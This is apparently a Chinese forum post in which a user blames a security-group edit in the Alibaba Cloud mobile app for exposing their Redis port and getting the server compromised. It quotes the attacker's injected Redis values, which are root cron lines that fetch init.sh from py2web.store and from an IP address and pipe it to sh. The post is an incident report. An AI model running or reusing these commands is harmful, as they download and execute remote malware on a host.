阿里云手机 App 上的一个操作导致我的服务器被入侵

事情是这样， 刚才发现我的一个服务挂了，仔细检查发现是 redis 问题，
我勒个去，我所有的 key 都没了，只剩下 backup1 - backup12 这十二个 key，内容略有不同，大致是下边这样

\n\n\n*/24 * * * * root wdt -q -O- http://py2web.store/cleanfda/init.sh | sh\n\n
\n\n\n*/4 * * * * root wget -q -O- http://176.123.10.57/cleanfda/init.sh | sh\n\n

怎么会这样，平时只开必要的端口，6379 是绝对不开的

时间回到 1 个小时前，我新跑了一个服务，需要打开 tcp 端口 12345，我拿出手机，打开阿里云，操作安全组，开端口，一气呵成。




咦？怎么不行？原来程序需要的是 tcp 端口，我设置成了 udp 。找到新增的一条规则，把 udp 改成 tcp，确定，O 了，搞定





经过就是这样，看出问题了吗？以上过程均可复现

被入侵，我想过很多种可能，却没想到这一种

到现在我也没找到阿里云的安全组操作日志在哪里